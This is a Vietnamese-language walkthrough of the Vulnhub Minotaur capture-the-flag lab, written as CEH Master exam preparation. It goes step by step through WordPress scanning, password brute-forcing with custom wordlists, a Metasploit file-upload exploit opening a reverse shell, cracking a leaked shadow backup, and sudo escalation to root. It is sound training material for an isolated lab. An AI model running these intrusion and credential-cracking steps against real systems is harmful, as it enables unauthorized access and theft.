Luyện Thi CEH Master Với Pentest & Hacking Lab Vulnhub Minotaur

Giới Thiệu

Tài liệu này cung cấp hướng dẫn chi tiết từng bước để hoàn thành phòng thí nghiệm (lab) Minotaur từ Vulnhub. Mục tiêu là giúp người học củng cố kiến thức và rèn luyện kỹ năng thực tế cần thiết cho kỳ thi Certified Ethical Hacker (CEH) Master. Lab Minotaur được thiết kế với nhiều thử thách, bao gồm các kỹ thuật bẻ khóa mật khẩu nâng cao và khai thác lỗ hổng đa tầng, mô phỏng các tình huống thực tế mà một chuyên gia kiểm thử xâm nhập có thể đối mặt.¹ Việc hoàn thành lab này sẽ trang bị cho người học kinh nghiệm quý báu trong việc xác định và khai thác các điểm yếu trên hệ thống.

Các Bài Học Chính Từ Lab Minotaur

Việc hoàn thành lab Minotaur mang lại nhiều bài học giá trị, trực tiếp liên quan đến các kỹ năng được kiểm tra trong kỳ thi CEH Master ²:

1. Tầm Quan Trọng Của Reconnaissance (Thu Thập Thông Tin): Lab nhấn mạnh việc thu thập thông tin ban đầu một cách kỹ lưỡng, từ quét cổng, dịch vụ đến rà quét thư mục web và các ứng dụng cụ thể như WordPress. Đây là nền tảng cho mọi cuộc tấn công thành công.
2. Kỹ Thuật Rà Quét và Phân Tích Lỗ Hổng: Thực hành sử dụng các công cụ như Nmap để quét cổng và dịch vụ, Dirbuster/Gobuster để phát hiện thư mục ẩn, và WPScan để phân tích lỗ hổng trên WordPress.¹ CEH Master yêu cầu khả năng xác định các lỗ hổng trên nhiều nền tảng.²
3. Bẻ Khóa Mật Khẩu Nâng Cao: Lab này đặt ra thử thách bẻ khóa mật khẩu không có sẵn trong các wordlist phổ biến như rockyou.txt.¹ Người học sẽ phải tự tạo wordlist tùy chỉnh bằng CeWL và sử dụng các quy tắc của John the Ripper để biến đổi wordlist, một kỹ năng quan trọng khi đối mặt với các mật khẩu phức tạp.
4. Khai Thác Lỗ Hổng Web: Tập trung vào việc khai thác lỗ hổng “authenticated file upload” trên một plugin WordPress, một dạng tấn công web phổ biến.¹ CEH Master kiểm tra kỹ năng tấn công ứng dụng web, bao gồm XSS, SQL injection, directory traversal, v.v..²
5. Sử Dụng Metasploit Framework: Lab cho thấy cách sử dụng Metasploit để tự động hóa quá trình khai thác sau khi đã có thông tin đăng nhập và xác định được lỗ hổng.¹ Việc thành thạo Metasploit là một lợi thế lớn.
6. Leo Thang Đặc Quyền (Privilege Escalation): Sau khi có quyền truy cập ban đầu, lab yêu cầu các kỹ thuật leo thang đặc quyền, bao gồm việc tìm và bẻ khóa file shadow để có được thông tin đăng nhập của người dùng khác, và sau đó sử dụng sudo để đạt quyền root.¹
7. Tư Duy Giải Quyết Vấn Đề và Vượt Qua “Red Herrings”: Lab có chứa các yếu tố “red herrings” (thông tin gây nhiễu) ¹, đòi hỏi người thực hiện phải có khả năng phân tích và không lãng phí thời gian vào các hướng đi sai lầm.
8. Kiên Trì và Phương Pháp Luận: Hoàn thành lab đòi hỏi sự kiên trì và một phương pháp luận tấn công có hệ thống, từ thu thập thông tin đến khai thác và leo thang đặc quyền.

Chuẩn Bị Môi Trường Lab

Để thực hành lab Minotaur, cần chuẩn bị một môi trường ảo hóa gồm máy mục tiêu (Minotaur VM) và máy tấn công (Kali Linux). Cả hai sẽ chạy trên VMware Workstation Player/Pro, được cài đặt trên hệ điều hành Windows.

1. Cài Đặt và Cấu Hình Máy Ảo Minotaur trên VMware

• Tải Minotaur VM:
• Truy cập Vulnhub và tìm kiếm “Minotaur”. Tải file máy ảo (thường ở định dạng .ova hoặc .zip chứa file .vmdk).
• Import Máy Ảo vào VMware:

• Mở VMware Workstation.
• Nếu là file .ova: Chọn “File” > “Open” và chọn file .ova đã tải. Làm theo hướng dẫn để import.
• Nếu là file .vmdk (thường đi kèm file .vmx hoặc cần tạo mới): Có thể tạo một máy ảo mới (“File” > “New Virtual Machine”) và ở bước chọn ổ đĩa, chọn “Use an existing virtual disk” và trỏ đến file .vmdk.
• Cấu Hình Mạng Cho Minotaur VM:

• Sau khi import, chọn máy ảo Minotaur và vào “Edit virtual machine settings”.
• Chọn “Network Adapter”. Trong phần “Network connection”, chọn “Host-only”. Điều này đảm bảo Minotaur VM chỉ giao tiếp với máy chủ (Windows) và các máy ảo khác trên cùng mạng host-only (như Kali Linux), tạo một môi trường lab biệt lập.
• Lưu ý quan trọng: Minotaur VM được thiết kế để tự nhận địa chỉ IP trong dải 192.168.56.0/24.¹ Đảm bảo rằng cấu hình mạng Host-only của VMware (thường là VMnet1) được thiết lập để cấp DHCP trong dải này hoặc bạn có thể cấu hình IP tĩnh cho card mạng VMnet1 của máy Windows trong dải này (ví dụ: 192.168.56.1). Không thay đổi cấu hình IP bên trong Minotaur VM vì CTF có thể không hoạt động đúng.¹
• Khởi Động Minotaur VM:
• Khởi động máy ảo Minotaur. Máy sẽ tự boot và nhận IP.

2. Cài Đặt và Cấu Hình Máy Ảo Kali Linux trên VMware

• Tải Kali Linux ISO:
• Truy cập trang chủ của Kali Linux (https://www.kali.org/get-kali/) và tải file ISO cài đặt (Installer image) phiên bản mới nhất cho kiến trúc amd64.⁵
• Tạo Máy Ảo Mới cho Kali Linux:

• Trong VMware, chọn “File” > “New Virtual Machine”.
• Chọn “Typical (recommended)” hoặc “Custom (advanced)” nếu muốn tùy chỉnh chi tiết hơn.
• Ở bước “Guest Operating System Installation”, chọn “Installer disc image file (iso)” và trỏ đến file ISO Kali Linux đã tải.⁵
• Chọn Guest OS là “Linux” và Version là “Debian 64-bit” (hoặc phiên bản Debian tương ứng với Kali).
• Đặt tên cho máy ảo (ví dụ: “Kali Linux CEH Master”) và chọn vị trí lưu trữ.
• Cấu hình dung lượng ổ đĩa: Phân bổ dung lượng ổ đĩa cho Kali (tối thiểu 20GB, khuyến nghị 30-40GB). Chọn “Store virtual disk as a single file” hoặc “Split virtual disk into multiple files” tùy sở thích.⁵
• Tùy chỉnh phần cứng (Customize Hardware):

• Memory: Phân bổ RAM cho Kali (tối thiểu 2GB, khuyến nghị 4GB trở lên).
• Processors: Phân bổ số lượng CPU cores (ví dụ: 2 cores).
• Network Adapter: Tương tự Minotaur VM, chọn “Host-only” để Kali Linux và Minotaur VM có thể giao tiếp với nhau trên cùng một mạng riêng.
• Hoàn tất việc tạo máy ảo.
• Cài Đặt Kali Linux:

• Khởi động máy ảo Kali Linux vừa tạo. Nó sẽ boot từ file ISO.
• Chọn “Graphical install” hoặc “Install” từ menu boot.⁶
• Thực hiện các bước cài đặt: chọn ngôn ngữ, vị trí, cấu hình bàn phím.
• Cấu hình mạng: Để Kali tự động nhận IP từ DHCP của mạng Host-only. Đặt hostname (ví dụ: kali).⁶
• Phân vùng ổ đĩa: Chọn “Guided – use entire disk” và sau đó “All files in one partition” cho người mới bắt đầu. Người dùng nâng cao có thể chọn phân vùng thủ công.⁶
• Thiết lập tài khoản người dùng: Tạo một tài khoản người dùng non-root và mật khẩu.
• Chọn phần mềm: Để các lựa chọn mặc định hoặc tùy chỉnh nếu biết rõ mình cần gì. Metapackage mặc định sẽ cài một hệ thống Kali chuẩn.⁶
• Cài đặt GRUB boot loader vào master boot record.
• Hoàn tất cài đặt và khởi động lại máy ảo Kali.
• Sau Khi Cài Đặt Kali:

• Đăng nhập vào Kali bằng tài khoản đã tạo.
• Mở Terminal và cập nhật hệ thống:
  Bash
  sudo apt update
  sudo apt upgrade -y
  sudo apt dist-upgrade -y
  
• Cài đặt VMware Tools (nếu chưa được cài tự động) để cải thiện hiệu suất và tính năng tương tác giữa máy chủ và máy ảo (như copy-paste, chia sẻ thư mục). Thường thì open-vm-tools đã được cài sẵn trên các bản Kali mới.
  Bash
  sudo apt install -y open-vm-tools-desktop fuse3
  
  Khởi động lại Kali sau khi cài đặt.

3. Kiểm Tra Kết Nối Mạng

• Trên máy Kali Linux, mở Terminal và kiểm tra địa chỉ IP:
  Bash
  ip a
  
  Địa chỉ IP của Kali nên nằm trong cùng dải mạng Host-only với Minotaur (ví dụ: 192.168.56.X).
• Sau khi Minotaur VM khởi động và nhận IP (thường sẽ hiển thị trên màn hình console của VM nếu không có giao diện đồ họa), hoặc bạn sẽ cần tìm IP của nó ở bước tiếp theo.

Hướng Dẫn Thực Hành Chi Tiết Lab Minotaur

Sau khi đã chuẩn bị xong môi trường, chúng ta sẽ tiến hành các bước tấn công lab Minotaur. Địa chỉ IP của máy Minotaur sẽ được gọi là <Target_IP> trong các lệnh dưới đây.

Giai đoạn 1: Reconnaissance và Scanning (Thu Thập Thông Tin và Rà Quét)

Mục tiêu của giai đoạn này là khám phá các dịch vụ đang chạy và các điểm yếu tiềm ẩn trên máy Minotaur.

• Bước 1: Phát Hiện Địa Chỉ IP của Minotaur VM

• Trên máy Kali Linux, sử dụng netdiscover để quét mạng Host-only và tìm IP của Minotaur.
  Bash
  sudo netdiscover -r 192.168.56.0/24
  
  (Thay 192.168.56.0/24 bằng dải mạng Host-only của bạn nếu khác).
• Kết quả mong đợi: netdiscover sẽ liệt kê các IP đang hoạt động. Xác định IP của Minotaur VM.⁷ Ghi lại địa chỉ IP này.
• Bước 2: Quét Cổng và Dịch Vụ với Nmap
• Sử dụng Nmap để thực hiện quét toàn bộ các cổng TCP, xác định phiên bản dịch vụ, và chạy các script kiểm tra cơ bản.
  Bash
  nmap -sV -sC -p- <Target_IP> -oN nmap_initial_scan.txt
  
  Hoặc chi tiết hơn:
  Bash
  nmap -A -T4 -p- <Target_IP> -oN nmap_full_scan.txt
  
  Trong đó:

• -sV: Phát hiện phiên bản dịch vụ.
• -sC: Chạy các script mặc định (default scripts).
• -p-: Quét tất cả 65535 cổng TCP.
• -A: Bật OS detection, version detection, script scanning, và traceroute.
• -T4: Tăng tốc độ quét (Aggressive).
• -oN nmap_scan.txt: Lưu kết quả ra file.

• Kết quả mong đợi: Phát hiện các cổng mở. Theo các walkthrough, sẽ có 3 cổng chính mở: 21 (FTP), 22 (SSH), và 80 (HTTP).¹
• Phân tích kết quả Nmap:
• Cổng 21 (FTP): Kiểm tra khả năng đăng nhập ẩn danh (anonymous login).
  Bash
  ftp <Target_IP>
  
  Khi được hỏi Name (192.168.56.X:youruser):, nhập anonymous.
  Khi được hỏi Password:, nhập một mật khẩu bất kỳ (hoặc để trống và nhấn Enter).
• Theo một số nguồn, đăng nhập FTP ẩn danh thành công nhưng không có file nào hữu ích trong thư mục.⁴ Đây có thể là một “red herring” – một chi tiết được đưa vào để đánh lạc hướng hoặc một bước cần thiết nhưng không trực tiếp dẫn đến khai thác ngay lập tức.¹ Việc kiểm tra này vẫn quan trọng để đảm bảo không bỏ sót thông tin.

• Cổng 22 (SSH): Ghi nhận cổng này đang mở. Cần có thông tin đăng nhập hợp lệ để khai thác, sẽ quay lại sau nếu tìm được.
• Cổng 80 (HTTP): Đây là mục tiêu chính cần điều tra sâu hơn vì các ứng dụng web thường chứa nhiều lỗ hổng.
• Bước 3: Rà quét Web Server (Cổng 80)

• Mở trình duyệt web trên máy Kali và truy cập địa chỉ http://<Target_IP&gt;.
• Kết quả mong đợi: Trang Apache mặc định sẽ hiển thị, cho biết có một web server đang hoạt động.¹
• Sử dụng công cụ dirb (hoặc gobuster, dirbuster) để tìm các thư mục và file ẩn trên web server. Các công cụ này sử dụng wordlist để thử các tên thư mục/file phổ biến.
  Bash
  dirb http://<Target_IP>/ -o dirb_results.txt
  
  Hoặc với gobuster:
  Bash
  gobuster dir -u http://<Target_IP>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -o gobuster_results.txt
  
• Kết quả mong đợi: Phát hiện thư mục /bull.¹ Thư mục này có thể chứa một ứng dụng web khác.
• Bước 4: Rà quét WordPress trong thư mục /bull

• Truy cập http://<Target_IP>/bull/ trên trình duyệt.
• Kết quả mong đợi: Một trang web dựa trên WordPress được tìm thấy.¹ WordPress là một Hệ Quản trị Nội dung (CMS) phổ biến, nhưng cũng thường có lỗ hổng nếu không được cập nhật hoặc sử dụng plugin/theme lỗi thời.
• Sử dụng wpscan, một công cụ chuyên dụng để quét lỗ hổng WordPress.
  Bash
  wpscan –url http://<Target_IP>/bull/ –enumerate u,p,t,tt –api-token <YOUR_WPSCAN_API_TOKEN>
  
  Trong đó:

• –url http://<Target_IP>/bull/: Địa chỉ trang WordPress cần quét.
• –enumerate u: Liệt kê tên người dùng.
• –enumerate p: Liệt kê các plugin.
• –enumerate t: Liệt kê các theme.
• –enumerate tt: Liệt kê các timthumb.
• –api-token <YOUR_WPSCAN_API_TOKEN>: Để có kết quả quét lỗ hổng đầy đủ và mới nhất, nên đăng ký một API token miễn phí từ wpscan.com và thêm vào lệnh.
• Kết quả mong đợi (dựa trên các walkthrough ¹):

• Phát hiện một hoặc nhiều tên người dùng, ví dụ: bully.
• Phát hiện các theme và plugin đã lỗi thời, có thể chứa lỗ hổng đã biết.
• Một plugin cụ thể được xác định là có lỗ hổng “authenticated file upload” (tải file lên khi đã xác thực). Ghi lại tên plugin này và phiên bản của nó. Lỗ hổng này cho phép người dùng đã đăng nhập có thể tải lên các file tùy ý, có khả năng là một web shell.

Giai đoạn 2: Giành Quyền Truy Cập Ban Đầu (Gaining Initial Access)

Mục tiêu của giai đoạn này là khai thác một lỗ hổng để có được quyền thực thi lệnh từ xa (shell) trên máy Minotaur.

• Bước 1: Chuẩn bị Bẻ khóa Mật khẩu cho người dùng bully

• Thử các mật khẩu phổ biến từ wordlist như rockyou.txt với hydra hoặc chức năng brute-force của wpscan thường sẽ thất bại, như được chỉ ra trong các gợi ý của lab.¹ Điều này cho thấy mật khẩu không đơn giản.
• Tạo wordlist tùy chỉnh bằng cewl: Lab Minotaur có gợi ý rằng một mật khẩu cần thiết không nằm trong các wordlist thông thường và người chơi cần tự tạo ra nó.¹
  cewl là một công cụ có thể thu thập các từ khóa từ một trang web để tạo wordlist.
  Bash
  cewl -w bully_words.txt -m 6 http://<Target_IP>/bull/
  
  Trong đó:

• -w bully_words.txt: Lưu wordlist vào file bully_words.txt.
• -m 6: Chỉ lấy các từ có độ dài tối thiểu là 6 ký tự.

• Kết quả mong đợi: File bully_words.txt được tạo, chứa các từ được trích xuất từ nội dung trang web http://<Target_IP>/bull/.
• Biến đổi wordlist bằng John the Ripper rules: Các mật khẩu thường không chỉ là từ đơn mà còn có thể là sự kết hợp, biến thể (thêm số, ký tự đặc biệt, viết hoa chữ cái đầu,…). John the Ripper có các quy tắc (rules) mạnh mẽ để biến đổi một wordlist cơ bản thành nhiều biến thể phức tạp hơn.
  Bash
  john –wordlist=bully_words.txt –rules –stdout > bully_mutated_words.txt
  
  Trong đó:

• –wordlist=bully_words.txt: Sử dụng wordlist đã tạo bằng cewl.
• –rules: Áp dụng các quy tắc biến đổi của John.
• –stdout: Xuất kết quả ra màn hình (để có thể chuyển hướng vào file).
• Kết quả mong đợi: File bully_mutated_words.txt được tạo, chứa một danh sách mật khẩu phong phú hơn nhiều so với bully_words.txt ban đầu, tăng khả năng tìm ra mật khẩu đúng.
• Bước 2: Tấn công Brute-force Mật khẩu bully

• Sử dụng wpscan hoặc hydra với wordlist bully_mutated_words.txt đã được biến đổi để brute-force mật khẩu của người dùng bully trên trang WordPress.
  Bash
  # Với wpscan
  wpscan –url http://<Target_IP>/bull/ -U bully -P bully_mutated_words.txt –api-token <YOUR_WPSCAN_API_TOKEN>
  
  Hoặc với hydra (lưu ý rằng việc sử dụng hydra cho WordPress login có thể phức tạp hơn do cần xác định đúng request POST và các tham số của form login, cũng như thông điệp báo lỗi/thành công):
  Bash
  # Ví dụ (cần điều chỉnh cho phù hợp với form login của WordPress trên lab):
  # hydra -l bully -P bully_mutated_words.txt <Target_IP> http-post-form “/bull/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=&testcookie=1:S=Location” -V
  
• Kết quả mong đợi: Sau một thời gian, công cụ sẽ tìm được mật khẩu chính xác cho người dùng bully.¹ Ghi lại mật khẩu này cẩn thận.
• Bước 3: Khai thác Lỗ hổng Authenticated File Upload qua Metasploit

• Với thông tin đăng nhập của bully và tên plugin WordPress có lỗ hổng “authenticated file upload” (đã tìm thấy ở Giai đoạn 1, Bước 4), bước tiếp theo là khai thác lỗ hổng này để tải lên một web shell và giành quyền điều khiển.
• Tìm kiếm trên Google hoặc trong Metasploit Framework một module khai thác cho lỗ hổng cụ thể của plugin đó. Metasploit thường có sẵn các module cho nhiều lỗ hổng phổ biến.¹
• Khởi động msfconsole:
  Bash
  msfconsole
  
• Tìm module khai thác trong Metasploit (thay <tên_plugin_wordpress> bằng tên plugin bạn đã tìm được):
  msf6 > search type:exploit platform:php wordpress <tên_plugin_wordpress> upload
  
• Chọn module phù hợp từ kết quả tìm kiếm (ví dụ, một module có tên như exploit/unix/webapp/… hoặc exploit/multi/http/…).
  msf6 > use <tên_module_exploit_đã_chọn>
  msf6 exploit(<tên_module_exploit_đã_chọn>) > show options
  
• Thiết lập các tùy chọn cần thiết cho module. Các tùy chọn quan trọng thường bao gồm:
  msf6 exploit(…) > set RHOSTS <Target_IP>
  msf6 exploit(…) > set RPORT 80
  msf6 exploit(…) > set TARGETURI /bull/
  msf6 exploit(…) > set USERNAME bully
  msf6 exploit(…) > set PASSWORD <mật_khẩu_bully_vừa_tìm_được>
  
  Và quan trọng nhất là cấu hình payload (thường là một reverse shell) và các tùy chọn cho payload:
  msf6 exploit(…) > set LHOST <IP_máy_Kali_của_bạn_trên_mạng_HostOnly>
  msf6 exploit(…) > set LPORT 4444 # Hoặc một cổng khác chưa sử dụng trên máy Kali
  
  Kiểm tra lại tất cả các tùy chọn bắt buộc (Required: yes) đã được thiết lập.
• Chạy exploit:
  msf6 exploit(…) > exploit
  
• Kết quả mong đợi: Nếu khai thác thành công, một session Meterpreter sẽ được mở, kết nối từ máy Minotaur về máy Kali của bạn.¹
  meterpreter >
  Meterpreter là một payload nâng cao của Metasploit, cung cấp nhiều chức năng để tương tác với hệ thống bị xâm nhập. Việc sử dụng các framework như Metasploit giúp đơn giản hóa đáng kể quá trình khai thác, đặc biệt khi đối mặt với các lỗ hổng phức tạp hoặc cần thực hiện nhanh chóng trong điều kiện thời gian giới hạn như kỳ thi CEH Master.¹ Tuy nhiên, điều quan trọng là phải hiểu rõ bản chất của lỗ hổng đang được khai thác chứ không chỉ đơn thuần là chạy lệnh.

Giai đoạn 3: Leo Thang Đặc Quyền và Khai Thác Sau Xâm Nhập (Privilege Escalation and Post-Exploitation)

Sau khi có được Meterpreter session (thường với quyền của người dùng web server, ví dụ www-data), mục tiêu tiếp theo là leo thang đặc quyền để trở thành người dùng root và chiếm toàn quyền kiểm soát hệ thống.

• Bước 1: Thu thập Flag Đầu tiên và Tìm shadow.bak

• Từ session Meterpreter, có thể lấy một shell tương tác của hệ thống:
  meterpreter > shell
  
• Tìm flag đầu tiên. Theo các walkthrough, flag này thường nằm trong thư mục web root /var/www/html/.¹
  $ cd /var/www/html
  $ ls -la
  $ cat flag1.txt # Hoặc một tên file flag tương tự
  
• Tiếp tục tìm kiếm các thông tin hữu ích. Thư mục /tmp thường là nơi chứa các file tạm hoặc các file bị rò rỉ. Di chuyển đến thư mục /tmp và kiểm tra.
  $ cd /tmp
  $ ls -la
  
• Kết quả mong đợi: Trong thư mục /tmp, bạn có thể tìm thấy một flag nữa và một file đáng chú ý là shadow.bak.¹ File
  shadow.bak có khả năng là một bản sao lưu của file /etc/shadow, chứa thông tin hash mật khẩu của người dùng trên hệ thống Linux.
• Tải file shadow.bak về máy Kali để phân tích. Nếu đang ở Meterpreter session, có thể dùng lệnh download:
  meterpreter > download /tmp/shadow.bak /root/Desktop/shadow.bak
  
  Nếu đang ở shell thông thường, có thể sử dụng các kỹ thuật khác như netcat hoặc python -m http.server để chuyển file.
• Bước 2: Bẻ khóa Hash từ shadow.bak

• Trên máy Kali, sử dụng John the Ripper (hoặc Hashcat) để bẻ khóa các hash mật khẩu trong file shadow.bak.
  Bash
  cd /root/Desktop/ # Di chuyển đến thư mục chứa file shadow.bak
  john shadow.bak –wordlist=/usr/share/wordlists/rockyou.txt
  Đôi khi John có thể nhận dạng sai loại hash.⁴ Nếu cần, có thể chỉ định định dạng hash:
  Bash
  # john –format=crypt shadow.bak –wordlist=/usr/share/wordlists/rockyou.txt
  
  Quá trình bẻ khóa có thể mất một chút thời gian tùy thuộc vào độ phức tạp của mật khẩu và sức mạnh của máy tính.
• Để xem các mật khẩu đã được bẻ khóa:
  Bash
  john –show shadow.bak
  
• Kết quả mong đợi: John the Ripper sẽ tìm ra mật khẩu cho ít nhất hai người dùng, một trong số đó là người dùng minotaur.¹ Ghi lại thông tin đăng nhập (username và password) của
  minotaur.
• Bước 3: Truy cập SSH bằng tài khoản minotaur

• Sử dụng thông tin đăng nhập của minotaur vừa bẻ khóa được để đăng nhập vào máy Minotaur qua SSH (cổng 22 đã phát hiện mở từ trước).
  Bash
  ssh minotaur@<Target_IP>
  
  Nhập mật khẩu của minotaur khi được yêu cầu.
• Kết quả mong đợi: Đăng nhập SSH thành công với tư cách người dùng minotaur.¹ Bây giờ bạn đã có một shell ổn định hơn và với quyền của một người dùng thực trên hệ thống.
• Bước 4: Tìm Flag của minotaur và Leo thang lên Root

• Sau khi đăng nhập với tư cách minotaur, kiểm tra thư mục nhà của người dùng này (/home/minotaur/) để tìm flag tiếp theo và các gợi ý có thể có.
  minotaur@Minotaur:~$ ls -la
  minotaur@Minotaur:~$ cat user.txt # Hoặc một tên file flag tương tự
  Theo ¹, sẽ có một flag ở đây, có thể kèm theo gợi ý về việc lấy flag cuối cùng từ thư mục root.
• Kiểm tra xem người dùng minotaur có quyền sudo nào không. Lệnh sudo -l sẽ liệt kê các lệnh mà người dùng hiện tại có thể chạy với quyền root (hoặc người dùng khác) thông qua sudo.
  minotaur@Minotaur:~$ sudo -l
  
• Kết quả mong đợi: Lệnh sudo -l có thể cho thấy người dùng minotaur được phép chạy một số lệnh với quyền root, hoặc thậm chí là tất cả các lệnh (ALL=(ALL:ALL) ALL hoặc (root) NOPASSWD: /usr/bin/su) mà không cần nhập lại mật khẩu hoặc chỉ cần nhập mật khẩu của chính minotaur.¹ Việc kiểm tra quyền
  sudo là một bước quan trọng trong quá trình leo thang đặc quyền, cho thấy rằng việc thu thập thông tin không chỉ dừng lại ở giai đoạn ban đầu mà là một quá trình liên tục ở mọi cấp độ truy cập.
• Nếu minotaur có quyền chạy su hoặc tương tự với sudo (ví dụ, sudo su), hãy sử dụng nó để chuyển sang người dùng root.
  minotaur@Minotaur:~$ sudo su
  
  Nhập mật khẩu của minotaur nếu được yêu cầu.
• Kết quả mong đợi: Dấu nhắc lệnh thay đổi thành của người dùng root (ví dụ: root@Minotaur:/home/minotaur#).
• Bây giờ, với quyền root, di chuyển đến thư mục /root và lấy flag cuối cùng.
  root@Minotaur:/home/minotaur# cd /root
  root@Minotaur:/root# ls -la
  root@Minotaur:/root# cat root.txt # Hoặc flag.txt như đề cập trong [1]
  
• Kết quả mong đợi: Thu được flag cuối cùng, hoàn thành lab Minotaur.

Khuyến Cáo Cho Việc Luyện Thi CEH Master

Kỳ thi CEH Master được thiết kế để kiểm tra kỹ năng thực hành của các chuyên gia ethical hacking trong một môi trường thực tế và có giới hạn thời gian.² Việc hoàn thành các lab như Minotaur là một phần quan trọng của quá trình chuẩn bị.

• Thực hành Đa dạng các Lab CTF:
• Minotaur là một ví dụ tốt, nhưng không nên dừng lại ở đó. Hãy thử sức với nhiều lab khác nhau trên các nền tảng như Vulnhub, Hack The Box, TryHackMe. Mỗi lab thường có những kịch bản, lỗ hổng và kỹ thuật khai thác khác nhau, giúp làm quen với sự đa dạng mà CEH Master có thể đưa ra.²
• Tập trung vào Tư duy Giải quyết Vấn đề (Problem-Solving Mindset):

• Không chỉ đơn thuần chạy các lệnh theo hướng dẫn. Điều quan trọng là phải hiểu tại sao một lệnh cụ thể được sử dụng, cách nó hoạt động, và kết quả mong đợi là gì.
• Khi gặp bế tắc (điều này rất phổ biến trong CTF và cả trong thực tế), hãy học cách tư duy sáng tạo, thử các phương pháp tiếp cận khác nhau, và quan trọng nhất là không bỏ cuộc. Khả năng “think on your feet” và hành động nhanh chóng, phù hợp là rất quan trọng.²
• Quản lý Thời gian Hiệu quả:

• CEH Master là một kỳ thi thực hành kéo dài 6 giờ.² Do đó, việc thực hành các lab dưới áp lực thời gian là rất cần thiết để cải thiện tốc độ làm việc và khả năng ra quyết định nhanh chóng.
• Học cách nhận biết các “red herrings” (những manh mối giả hoặc không dẫn đến đâu) ¹ và không lãng phí quá nhiều thời gian vào chúng. Biết khi nào nên từ bỏ một hướng tiếp cận và thử hướng khác.
• Ghi chép Chi tiết và Hệ thống:

• Trong quá trình thực hành các lab, hãy tập thói quen ghi chép lại các lệnh đã sử dụng, kết quả thu được, những gì đã thử và hiệu quả, những gì không hiệu quả, và tại sao. Điều này không chỉ giúp củng cố kiến thức mà còn tạo ra một tài liệu tham khảo cá nhân quý giá.
• Trong kỳ thi CEH Master, việc ghi chép cẩn thận có thể giúp theo dõi tiến trình, tránh lặp lại các bước không cần thiết và hỗ trợ việc tổng hợp báo cáo (nếu có yêu cầu như vậy trong kịch bản thi). Mặc dù Minotaur không yêu cầu báo cáo, việc rèn luyện thói quen này là cần thiết cho công việc thực tế và các kỳ thi có thể yêu cầu tóm tắt hành động hoặc lỗ hổng tìm thấy.²
• Hiểu Rõ Các Giai đoạn của một Cuộc Kiểm Thử Xâm Nhập (Penetration Testing Phases):
• Nắm vững quy trình chuẩn của một cuộc kiểm thử xâm nhập: Reconnaissance (Thu thập thông tin), Scanning (Rà quét), Gaining Access (Giành quyền truy cập), Maintaining Access (Duy trì quyền truy cập), và Covering Tracks (Xóa dấu vết). Lab Minotaur bao gồm hầu hết các giai đoạn này, mặc dù nó không tập trung nhiều vào “Covering Tracks”. CEH Master sẽ kiểm tra hiểu biết và khả năng áp dụng các kỹ thuật trong các giai đoạn này.²
• Làm quen và Thành thạo các Công cụ Phổ biến:
• Thành thạo các công cụ được đề cập trong hướng dẫn này (Nmap, CeWL, John the Ripper, Metasploit, WPScan) và các công cụ quan trọng khác thường được sử dụng trong pentest như Burp Suite, Wireshark, Hydra, sqlmap, enum4linux, v.v. Kỳ thi CEH Master sẽ cung cấp một môi trường lab với hơn 2200 công cụ hacking phổ biến ², vì vậy việc biết sử dụng công cụ nào cho tình huống nào là rất quan trọng.

Kết Luận

Việc thực hành lab Minotaur trên Vulnhub là một bài tập vô cùng giá trị cho bất kỳ ai đang chuẩn bị cho kỳ thi CEH Master hoặc muốn nâng cao kỹ năng kiểm thử xâm nhập thực tế. Lab này không chỉ củng cố kiến thức về các kỹ thuật tấn công cụ thể mà còn rèn luyện tư duy phân tích, giải quyết vấn đề, và khả năng làm việc dưới áp lực – những yếu tố then chốt của một chuyên gia an ninh mạng.

Minotaur, với các thử thách đặc trưng như bẻ khóa mật khẩu tùy chỉnh và một chuỗi tấn công nhiều giai đoạn từ web đến leo thang đặc quyền root, mô phỏng khá tốt tính thực tế và độ khó có thể gặp trong kỳ thi CEH Master.¹ Sự kiên trì, học hỏi liên tục từ mỗi lab, và một phương pháp luận vững chắc sẽ là chìa khóa để chinh phục không chỉ Minotaur mà còn cả chứng chỉ CEH Master và thành công trong sự nghiệp an ninh mạng.